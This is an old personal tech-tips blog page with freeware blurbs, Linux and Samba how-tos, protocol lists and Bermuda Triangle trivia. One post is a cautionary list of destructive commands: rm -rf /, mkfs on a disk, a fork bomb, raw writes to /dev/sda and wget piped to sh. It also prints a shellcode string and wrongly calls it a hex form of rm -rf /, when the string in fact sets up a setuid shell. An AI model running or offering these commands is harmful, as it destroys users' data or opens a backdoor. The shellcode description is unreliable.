Tips related to

Wednesday 31 March 2010

AxCrypt - File Encryption for Windows


AxCrypt - Personal Privacy and Security with AES-128 File Encryption and Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to automatically decrypt and open documents. Store strong keys on removable USB-devices.
download here

PDF Split and Merge


PDF Split and Merge is an easy to use tool to merge and split pdf documents. Console and GUI versions are available. The GUI is written in Java Swing and it provides functions to select files and set options. It's made over the iText library.
download here

KeePass Password Safe


KeePass Password Safe is a free, open source, light-weight and easy-to-use password manager for Windows. You can store your passwords in a highly-encrypted database, which is locked with one master password or key file.
download here

XBMC Media Center


XBMC Media Center is a free cross-platform media player software and entertainment system application framework for Linux, Mac, and Windows. XBMC is capable of playing back and streaming all popular video, audio, and picture formats out-of-the-box.
download here

TV-browser


TV-Browser is a java-based TV guide which can be easily extended with lots of plugins. It is designed to look like your paper TV guide.
download here

home player


HomePlayer is an extention of the FreePlayer software provided by the french internet provider
download here

TUX-PAINT


A drawing program for young children with sound effects, a cartoon character, and fun 'rubber stamp'/'stickerbook' pictures.
download here

Tuesday 23 March 2010

How install/share printer on Redhat linux machine?

Edit /etc/samba/smb.conf file with

[global]
workgroup = WORKGROUP
security = user
printcap name = cups
disable spools = Yes
show add printer wizard = No
printing = cups

[printers]
comment = All Printers
path = /var/spool/samba
printer admin = tech, general
create mask = 0770
guest ok = Yes
printable = Yes
use client driver = Yes
browseable = Yes


# service smb restart (Restar samba server once)

Go to Win client machine

Run--> 192.168.1.11 --> user name --> Password --> right click on shared printer --> connect --> follow up coming istructions.... finish

Linux commands

By default most of the commands you can execute are placed in the /bin folder. However, you can add another folder where your user will look for commands from. Lets do that ;)
(if in any of the following cases you get "permission denied" error, then do the same action, but logged as root.)



(first create that folder, in this example ~/.bin)
$mkdir ~/.bin
(next, lets add that folder to PATH via ~/.bashrc)
$nano ~/.bashrc
(in the ~/.bashrc file, simply add the following line)
$export PATH=$PATH:~/.bin



Great, you have your own folder in which your shells will look for commands whenever you type a command. Now we need to only make bash scripts for the commands in the folder. Note that we could have just made the scripts in the default /bin folder, but for neatness, it's good not to mix your own commands with the system's default ones.

How to make the scripts?


Simply create a file using your favourite text editor, named with the name of the command you want to create, in which you will put all the commands that you want to be executed, each one in a new line, and make that file executable.
So lets make a testscript file that will print out on the screen "it worked!".
Create a file named "testscript" in the .bin folder and put the following line in it:


echo "it worked!"

Save the file. To make it executable run the following command as root:

#chmod +x testscript

Now relogin, or just in a new terminal window test it ;)

$testscript
it worked!

Examples of useful things you can do with what you just learned.
Ever wished synchronizing and updating eix was simpler? Just make a script called synch, or whatever with the commands you wish it to cover:


emerge --sync
update-eix


Just make sure you edit root's .bashrc too, cause the above commands work for root users only. And don't forget to chmod +x it ;)

Ever thought that typing "mplayer -fps 15 tv:// -tv driver=v4l2:device=/dev/v4l/video0", or whatever command you're using for mplayer to use your webcam was too hard to remember?
Make a script called "camera" with that command in.

So you can simplify all your work you do often that includes multiple commands.

10 ways to Tweak your Linux Boot Process

Linux rarely needs to be rebooted. But when it does, it’s often slow to boot. Fortunately, there are ways to speed things up. Some of these methods are not terribly difficult. (although some, unfortunately, are). Let’s take a look.

#1: Disable unnecessary services

Depending upon the use of the machine, plenty of services won’t be needed. Using Linux just for a desktop? Then you won’t need sendmail, httpd, and many other services. If your server is only a Web server, you can shut off many services as well. To do this, you can go to the Administration menu and take a look at the Services entry. Just deselect all of the services you don’t want to start.


#2: Disable unnecessary kernel modules


If your desktop is wired to the Ethernet, you don’t need to have a wireless kernel module loaded. This task is a bit more difficult and will require a kernel recompilation, which is not the easiest task to undertake. To do this, you will need the kernel sources. Then, follow the standard steps for compiling a kernel. The difference is that you’re going to go through your system and disable all of the modules you don’t need.

The best way to find out what kernel modules currently install and run on your system is to install Bootchart. Not only will this give you a good list of modules, it will illustrate for you what is happening during your system boot. You can also issue the command chkconfig –list | grep 3:on to find out what services are running. Once you know what loading modules you don’t need, you can remove them during a kernel recompilation. While you’re at it, compile the kernel to exactly match your architecture


#3: Use a lightweight window manager instead of GNOME or KDE


I plug smaller footprint window managers for a reason — they drastically reduce graphical boot time. Instead of having to wait that extra 30 to 60 seconds for GNOME or KDE to boot up, why not wait two to 10 seconds for Enlightenment or XFCE to boot up? Not only will they save you boot time, they will save your memory and the headache of dealing with bloatware.

#4: Use a text-based login instead of a graphical login

Most of my Linux machines boot to run level 3 instead of run level 5. This will halt at the text-based login, where I only have to log in and issue startx to start my desktop of choice. The graphical logins do two things: increase load times and create headaches trying to recover from an X windows fubar.

#5: Use a lighter-weight distribution


Instead of loading the heavyweight Fedora, why not try a Gentoo, Arch, or Puppy Linux? The boot times for these smaller distributions are far faster than the more bloated Fedora (and even Ubuntu). Of the larger distributions, OpenSuSE claims to boot the fastest, but I have not personally tested this. Between the latest Fedora and Ubuntu, Ubuntu blows Fedora’s boot times away (and that is out of the box).

#6: Use an OpenBIOS


If you’re savvy enough to upgrade your PC’s firmware, you might consider migrating to an open source BIOS. One caveat to using open firmware is that it allows Linux to actually initialize the hardware as it boots (instead of relying on the BIOS). On top of that, many open BIOSes can be configured to meet your machine’s specific needs. If you don’t go the open BIOS route, you can at least configure your BIOS to not search for a floppy drive that’s not there or to boot directly to the first hard drive (instead of the CD drive first).

#7: Avoid dhcp

If you are working on a home network (or a small business network) where address lease isn’t a problem, go with static IP addresses. This will keep your machine from having to call out to a dhcp server to get an IP address. If you take this approach, make sure you configure your /etc/resolve.conf to reflect your DNS server addresses as well.

#8: If you can spare it, get rid of hotplug


Hotplug is the system that allows you to plug in new devices and use them immediately. If you know your server won’t need this system, delete it. This will cut down on boot time. On many systems, hotplugging consumes much of the boot time. Removing hotplug will vary depending upon the distribution you use. NOTE: udev has, for the most part, replaced hotplug. But if you’re running an older distribution, this does apply.

#9: If you are REALLY daring, you could give initng a try


The initng system serves as a replacement for the sysvinit system and promises to drastically decrease boot times in UNIX-like operating systems. If you would like to see the initng system in action, you can give the Pingwinek livecd a try.

#10: Use a hack with Debian


If you’re using Debian, there is a simple hack you can use to switch your startup scripts to run in parallel. If you look at the /etc/init.d/rc script, you will see: CONCURRENCY=none around line 24. Change this line to CONCURRENCY=shell and you should see a reduction in boot times.

That’s about it. Of course there are always more and better hacks out there. But the above should mostly cover everything. The good news is that you’re most likely already running Linux, so the burden of boot times is generally eased by the infrequency of reboots.

Deadly Linux commands that you should avoid.

These are the list of deadly Linux commands that you should avoid.

1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

if you have something to add, please share it here.

Sunday 21 March 2010

chianese search engine BAIDU

Many people have asked about the meaning of our name. 'Baidu' was inspired by a poem written more than 800 years ago during the Song Dynasty. The poem compares the search for a retreating beauty amid chaotic glamour with the search for one's dream while confronted by life's many obstacles. '...hundreds and thousands of times, for her I searched in chaos, suddenly, I turned by chance, to where the lights were waning, and there she stood.' Baidu, whose literal meaning is hundreds of times, represents persistent search for the ideal.

3dsudoku

Saturday 20 March 2010

Monday 15 March 2010

How to hide a folder without any software in windows.


Step 1:- First open character map from program->accessories->system tools->character map.

Step 2:- Then in font name Arial find a character with keystroke Alt+0160.

Step 3:- Copy the character.

Step 4:- Let the name of the folder to hide is "target", Right click that folder and rename it by pasting the character which is copied from the character map.

Step 5:- You will see the folder is now anonymous.Right click the folder and click properties ,select the customize tab abd then click on change icon .

Step 6:- In the window that appear select a blank icon ,click OK ad then Apply the changes.

Step 7:- You have sucessfully hide a folder!

Friday 12 March 2010

basic of computers

Computers are made of the following basic components:

1. Case with hardware inside:

* Power Supply - The power supply comes with the case, but this component is mentioned separately since there are various types of power supplies. The one you should get depends on the requirements of your system. This will be discussed in more detail later

* Motherboard - This is where the core components of your computer reside which are listed below. Also the support cards for video, sound, networking and more are mounted into this board.

 :::Microprocessor - This is the brain of your computer. It performs commands and instructions and controls the operation of the computer.
 :::Memory - The RAM in your system is mounted on the motherboard. This is memory that must be powered on to retain its contents.
 :::Drive controllers - The drive controllers control the interface of your system to your hard drives. The controllers let your hard drives work by controlling their operation. On most systems, they are included on the motherboard, however you may add additional controllers for faster or other types of drives.

* Hard disk drive(s) - This is where your files are permanently stored on your computer. Also, normally, your operating system is installed here.

* 4. CD-ROM drive(s) - This is normally a read only drive where files are permanently stored. There are now read/write CD-ROM drives that use special software to allow users to read from and write to these drives.

* 5. Floppy drive(s) - A floppy is a small disk storage device that today typically has about 1.4 Megabytes of memory capacity.

* 6. Other possible file storage devices include DVD devices, Tape backup devices, and some others.

   2. Monitor - This device which operates like a TV set lets the user see how the computer is responding to their commands.

   3. Keyboard - This is where the user enters text commands into the computer.

   4. Mouse - A point and click interface for entering commands which works well in graphical environments.

Friday 5 March 2010

The greate mystry-Barmuda Triangle


Aircraft incident
    * 1945: December 5, Flight 19 (5 TBF Avengers) lost with 14 airmen, and later the same day PBM Mariner BuNo 59225 lost with 13 airmen while searching for Flight 19.
    * 1948: January 30, Avro Tudor G-AHNP Star Tiger lost with 6 crew and 25 passengers, en route from Santa Maria Airport in the Azores to Kindley Field, Bermuda.
    * 1948: December 28, Douglas DC-3 NC16002 lost with 3 crew and 29 passengers, en route from San Juan, Puerto Rico, to Miami.
    * 1949: January 17, Avro Tudor G-AGRE Star Ariel lost with 7 crew and 13 passengers, en route from Kindley Field, Bermuda, to Kingston Airport, Jamaica.

sea incident
    * 1843: USS Grampus, schooner, last seen March 15, presumed sunk in a gale off Charleston, South Carolina.
    * 1918: USS Cyclops, collier, left Barbados on March 4, lost with 309 crew and passengers en route to Baltimore, Maryland.
    * 1921: January 31, Carroll A. Deering, five-masted schooner, Captain W.B. Wormell, 11 crew, found aground and abandoned at Diamond Shoals, near Cape Hatteras, North Carolina.
    * 1925: December, SS Cotopaxi, tramp steamer, Captain Meyers, went missing with crew of 32 after leaving Charleston, South Carolina for Havana, Cuba, reported caught in tropical storm.
    * 1967: December 22, Witchcraft, cabin cruiser, 2 onboard, disappears one mile (1.6 km) off Miami; had called Coast Guard requesting a tow, but on their arrival 19 minutes later no trace found; possibly pushed north by Gulf Stream; search involved 1,200 square miles (3,100 km2).
    * 1872: December 5, Mary Celeste, a 282-ton brigantine, sailed from Staten Island, New York City, bound for Genoa, Italy, on 7 November, and was found abandoned some 400 miles (640 km) east of the Azores; her last log entry on November 24 gave her position as 100 miles (160 km) west of the Azores.
    * 1925: April 21, Raifuku Maru, a Japanese cargo ship which sank with the loss off all 38 crew, supposedly went down in the Triangle after sending out an SOS signal which allegedly read "Danger like dagger now. Come quick!", but in reality the ship was seen to sink in a gale off Nova Scotia and the SOS message did not contain the word "dagger".
    * 1942: February 18, FS Surcouf, a Free French Naval Forces submarine en route for Tahiti via the Panama Canal, sank about 80 miles (130 km) north of Cristóbal, Colón, after a night-time collision with the American cargo ship Thompson Lykes.
    * 1963: February 3, SS Marine Sulphur Queen T-2 tanker carrying molten sulphur, lost with  39 crew near Dry Tortugas in the Straits of Florida, west of Miami.


incident in land
1969: Great Isaac Lighthouse (Bimini, Bahamas) - its two keepers disappeared and were never found.

Future of mobile technology.

This is not a virtual thinking. This is a picture of a famous technical country
who break many of record in mobile technology.

Engg makes mobile out of demand and for increment of technology.We made a recent technology but these are the output of mobile creation.

masti of software engg.

If a software engg make a movie then name of movies will be...............

1. Hang To Hona Hi Tha !!!!!!!!!!!!
2. Meri Disc Tumhare Paas Hai
3. Aao Chat Kare
4. Programmer No.1
5. Mera Naam Developer
6. Java Wale Job Le Jayenge
7. Hum Apke Memory Mein Rehte Hein
8. Do Processor Baarah Terminal
9. Tera Code Chal Gaya
10. Har Din Jo Mail Karega
11. Network Ke Us Paar
12. Debugging Koi Khel Nahi
13. Jish Desh Mein Bill Gates Rehta Hai
14. Raju Ban Gaya Administrator .!
15. Client Ek Numbari Programmer Dus Numbari
16. Login Karo Sajana
18. Naukar PC Ka
19. 1942 -- A Bug Story
20. Kaho Na Virus Hai
21. Crash Se Crash Tak
22. Haan Maine Bhi Debug Kiya Hai
23. Password De Ke Dekho
24. RAM-ayan.
25. Kya Mouse ne kaha....

List of network protocols



Layer 1 protocols (Physical Layer)

1) ADSL- Asymmetric Digital Subscriber Line
2) ISDN- Integrated Services Digital Network
3) PDH- Plesiochronous Digital Hierarchy
4) RS-232
5) SDH- Synchronous Digital Hierarchy
6) SONET- Synchronous Optical NETworking


Layer 1+2 protocols

1) Ethernet
2) GFP- Generic Framing Procedure
3) OTN- Optical Transport Network(Optical Channel Wrapper or Digital Wrapper Technology)


Layer 2 protocols (Data Link Layer)

1) ARCnet- Attached Resource Computer NETwork
2) CDP- Cisco Discovery Protocol
3) DCAP- Data Link Switching Client Access Protocol
4) DTP-Dynamic Trunking Protocol
5) Econet
6) FDDI- Fiber Distributed Data Interface
7) Frame Relay
8) ITU-T G.hn Data Link Layer
9) HDLC-- High-Level Data Link Control
10) IEEE 802.11 WiFi
11) IEEE 802.16 WiMAX
12) LocalTalk
13) L2F- Layer 2 Forwarding Protocol
14) L2TP- Layer 2 Tunneling Protocol
15) LAPD- Link Access Procedures on the D channel
16) LLDP- Link Layer Discovery Protocol
17) LLDP- MED Link Layer Discovery Protocol
18) PPP- Point-to-Point Protocol
19) PPTP- Point-to-Point Tunneling Protocol
20) Q.710 Simplified Message Transfer Part
21) NDP-Neighbor Discovery Protocol
22) RPR- IEEE 802.17 Resilient Packet Ring
23) SLIP- Serial Line Internet Protocol (obsolete)
24) StarLAN
25) STP- Spanning Tree Protocol
26) Token ring is not a protocol but is a topology
27) VTP- VLAN Trunking Protocol


Layer 2+3 protocols

1) ATM- Asynchronous Transfer Mode
2) Frame relay
3) MPLS- Multi-protocol label switching
4) X.25
5) ARP- Address Resolution Protocol
6) RARP- Reverse Address Resolution Protocol


Layer 1+2+3 protocols

1) MTP- Message Transfer Part
2) NSP- Network Service Part


Layer 3 protocols (Network Layer)

1) CLNP- Connectionless Networking Protocol
2) EGP- Exterior Gateway Protocol
3) EIGRP- Enhanced Interior Gateway Routing Protocol
4) ICMP- Internet Control Message Protocol
5) IGMP- Internet Group Management Protocol
6) IGRP- Interior Gateway Routing Protocol
7) IPv4- Internet Protocol version 4
8) IPv6 -Internet Protocol version 6
9) IPSec- Internet Protocol Security
10) IPX- Internetwork Packet Exchange
11) SCCP- Signalling Connection Control Part
12) AppleTalk DDP


Layer 3 protocols (Network Layer management)

1) IS-IS-- Intermediate System-to-Intermediate System
2) OSPF- Open Shortest Path First
3) BGP- Border Gateway Protocol
4) RIP- Routing Information Protocol
5) ICMP- Router Discovery Protocol: Implementation of RFC 1256
6) GDP- Gateway Discovery Protocol


Layer 3.5 protocols

1) HIP Host Identity Protocol


Layer 3+4 protocol suites

1) Xerox Network Systems


Layer 4 protocols (Transport Layer)

1) AHAH Authentication Header over IP or IPSec
2) ESPESP Encapsulating Security Payload over IP or IPSec
3) GRE Generic Routing Encapsulation for tunneling
4) IL Originally developed as transport layer for 9P
5) SCTP Stream Control Transmission Protocol
6) Sinec H1 for telecontrol
7) SPX Sequenced Packet Exchange
8) TCP Transmission Control Protocol
9) UDP User Datagram Protocol


Layer 5 protocols (Session Layer)

1) 9P Distributed file system protocol developed originally as part of Plan 9
2) NCP NetWare Core Protocol
3) NFS Network File System
4) SMB Server Message Block
5) SOCKS "SOCKetS"


Other protocols

1) Controller Area Network (CAN)
2) Common Industrial Protocol (CIP)
3) Digital Command Control (DCC)
4) Financial Information eXchange (FIX)
5) I²C
6) modbus
7) DECnet protocol family from Digital Equipment Corporation (now HP)
8) Service Location Protocol SLP
9) Service Advertising Protocol SAP


Layer 7 protocols (Application Layer)

1) AFP Apple Filing Protocol
2) BACnet Building Automation and Control Network protocol
3) BitTorrent A peer-to-peer file sharing protocol
4) BOOTP Bootstrap Protocol
5) Diameter an authentication, authorization and accounting protocol
6) DICOM includes a network protocol definition
7) DICT Dictionary protocol
8) DNS Domain Name System
9) DHCP Dynamic Host Configuration Protocol
10) ED2K A peer-to-peer file sharing protocol
11) FTP File Transfer Protocol
12) Finger which gives user profile information
13) Gnutella a peer-to-peer file-swapping protocol
14) Gopher a hierarchical hyperlinkable protocol
15) HTTP Hypertext Transfer Protocol
16) IMAP Internet Message Access Protocol
17) IRC Internet Relay Chat
18) ISUP (ISDN User Part)
19) XMPP
20) LDAP (Lightweight Directory Access Protocol)
21) MIME (Multipurpose Internet Mail Extensions)
22) MSNP (Microsoft Notification Protocol (used by Windows Live Messenger)
23) MAP (Mobile Application Part)
24) NetBIOS (File Sharing and Name Resolution protocol)
25) NNTP (News Network Transfer Protocol)
26) NTP (Network Time Protocol)
27) NTCIP (National Transportation Communications for Intelligent Transportation System Protocol)
28) POP3 (Post Office Protocol Version 3)
29) RADIUS (authentication, authorization and accounting protocol)
30) Rlogin (UNIX remote login protocol)
31) rsync (file transfer protocol for backups, copying and mirroring)
32) RTP (Real-time Transport Protocol)
33) RTSP (Real-time Transport Streaming Protocol)
34) SSH (Secure Shell)
35) SISNAPI (Siebel Internet Session Network API)
36) SIP (Session Initiation Protocol)
37) SMTP (Simple Mail Transfer Protocol)
38) SNMP (Simple Network Management Protocol)
39) SOAP (Simple Object Access Protocol)
40) STUN (Session Traversal Utilities)
41) TUP (Telephone User Part)
42) Telnet remote terminal access protocol)
43) TCAP (Transaction Capabilities Application Part)
44) TFTP (Trivial File Transfer Protocol, a simple file transfer protocol)
45) WebDAV (Web Distributed Authoring and Versioning)
46) DSM-CC (Digital Storage Media Command and Control)

Thursday 4 March 2010

List of protocols


Pro-active(table-driven)routing:
AWDS=Ad-hoc Wireless distribution service
Babel=DSDV
CSGR=Clusterhead gateway switch routing protocol
DFR=direction forward routing
DBF=distributed bellmanford outing protocol
DSDV=High Dynamic destination sequence Distance Vectorrouting protocol
Guess work
HSR=hierarical state routing protocol
IRAP=Intrazone Routing Protol
OLSR=Optimized Link State Routing protocol
TBRPF=Topology dissemination based on Reverse-Path forwarding routing protocol
WAR=Wireless aided routing
WRP=Wireless routing protocol


Reactive (on-demand)protocol:
SENCAST
Multirate Ad-hoc on demand distance vector routing protocol
Reliable Ad-hoc on demand distance vector routing protocol
Ariande
Assosiativity based routing
Ad-hoc On-demand distance vector
CHAMP=CaHing And Multi Path Routing
Dynamic Source routing
Dynamic Manet On-demand Routing
Mobile ad-hoc On-demand Data Delivery Protocol


flow-oriented routing:
GB=Gefni-Bertsekas
IERP=Interzone routing protocol
LBR=Link Life based routing
LMR=Lightweight Mobile Routing protocol
LQSR=Link quality sourse routing
LUNAR=Light Underlay Network Ad hoc routing
MOR=Multipath Ondemand routing Protocol
MPRDV=Multi Point Relay Distance VEctor protocol
QuaSAR=QoS aware sourse initiated ad-hoc routing
RDMAR=Relative Distance Micro-Discovry Ad-hoc routing protocol
SrcRR
SSR=SignalStability Routing protocol
PLBR=Prefered Link Based routing
VRR=Vehicular Reactive routing protocol


Hybrid(both Proactive and reactive)routing:
ARPAM
HRPLS(Hybrid routing protocol for large scale Mobile ad-hoc network backbones)
HSLS=Hazy sighted link state routing protocol
HWMP=Hybrid wireless mesh protocol
OORP=Order One Routing Protocol
TORA
ZRP=Zone routing protocol


Hierarical routing protocol:
CBRP=Cluster based routing protol
CEDAR=Core extension Ad-hoc routing
DART=Dynamic address routing
DDR=Distributed dynamic routing system
FSR=Fisheye State routing protocol
GSR=Global State routing protocol
HARP=Hybrid ad-hoc routing protocol
HSR=Host Specific routing protocol
HSR=Hierarchical state routing
LANMAR=Landmark routing protocol for Large Scale network

List of Web Browser


A browser is usually included with the installation of your operating system, but you are not restricted to that choice. Some of the factors to consider when deciding which browser best suits your needs include

    * compatibility - Does the browser work with your operating system?

    * security - Do you feel that your browser offers you the level of security you want?

    * ease of use - Are the menus and options easy to understand and use?

    * functionality - Does the browser interpret web content correctly? If you need to install other plug-ins or devices to translate certain types of content, do they work?

    * appeal - Do you find the interface and way the browser interprets web content visually appealing?


Notable browser:
worldwideweb
mosaic
netscapenavigator
internet explorer
opera
mozila nevigator
safari
mozila firefox
google chrome


Notable layout engine:
trident(Microsoft IE 4)
tasman(IE 5)
gecko(mozila foundation)
khtml(KDE)
webkit(apple inc)
presto(opera software)


Trident shells:
AOL explorer
Avant browser
Bento browser
Enigma
GreenBrowser
Maxthon
MenuBox
MSN explorer
Neo planet
NeCaptor
iRider
Realplayer
Tancent Traveler
TheWorldBrowser
UltraBrowser
WebbIE

Gecko-based browser:
mozila application suit
seaMonkey
classila
yahoo
galeon GNOME
K-mleon(window)
mozila firefox
swiftfox
flock
Xero bank browser
Iceweasel
DocZilla
camino
Conkeror
Minimo
fennec
SkyFire

KHTML browser:
Konqueror
konqueror Embedded


Web kit browser:
Abrowse
Arora
web Browser
BOLT browser
google chrome
Epiphany
iCab
Iris browser
Konqueror
midori
OmniWeb
OWB
SAfari
Shiira
sputnik
SRWare Iron
Stainless
TeaShark
Uzbl
Web Browser for s60(mobile)
webOS

Presto based browser:
Internetchannei
Nintendo DS Browser
HotJAVA
LOBO
Operamini
uZard Web
X-Smiles
Flying saucer
UCWEB


Speciality browser:
Gollum browser
Image Xplorer
Kirix Starta
Miro
Songbird
SpaceTime
Wyzo
ghostzilla
prodigy classic
3B
Abaco
Amaya
arahne
Arianda
Aweb
Charon
dillo
Gazelle
Mothara
Netpositive
Netsurf
Oregano
Planetweb
Voyager


MOBILE browser:
Alynx
Elinks
Emacs/w3
Links
Net-tamer
W3m
webbIE

Wednesday 3 March 2010

How to know if anyone is online or not on GMAIL

The technology g-mail "invisible" is might be recent gadget on google talk and gmail chat. If you want to know about these mister india who's are not offline but ofcourse not online on your G-mail.
You can know about that fron these steps.

you want to know about who's invisible on gmail
(1)first open the chat window for contact
(2)if you see the massess "chat is off-record" then insert your appropriate email-id and password 
(3)if you see a massess in red link"mukesh25011988@gmail.com is offline and can't received your massess right now" it indicate user are really offline
(4)and if you get nothing then user is invisible or any status updates in gray it means the user is online but invisible.

Tuesday 2 March 2010

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | 100 Web Hosting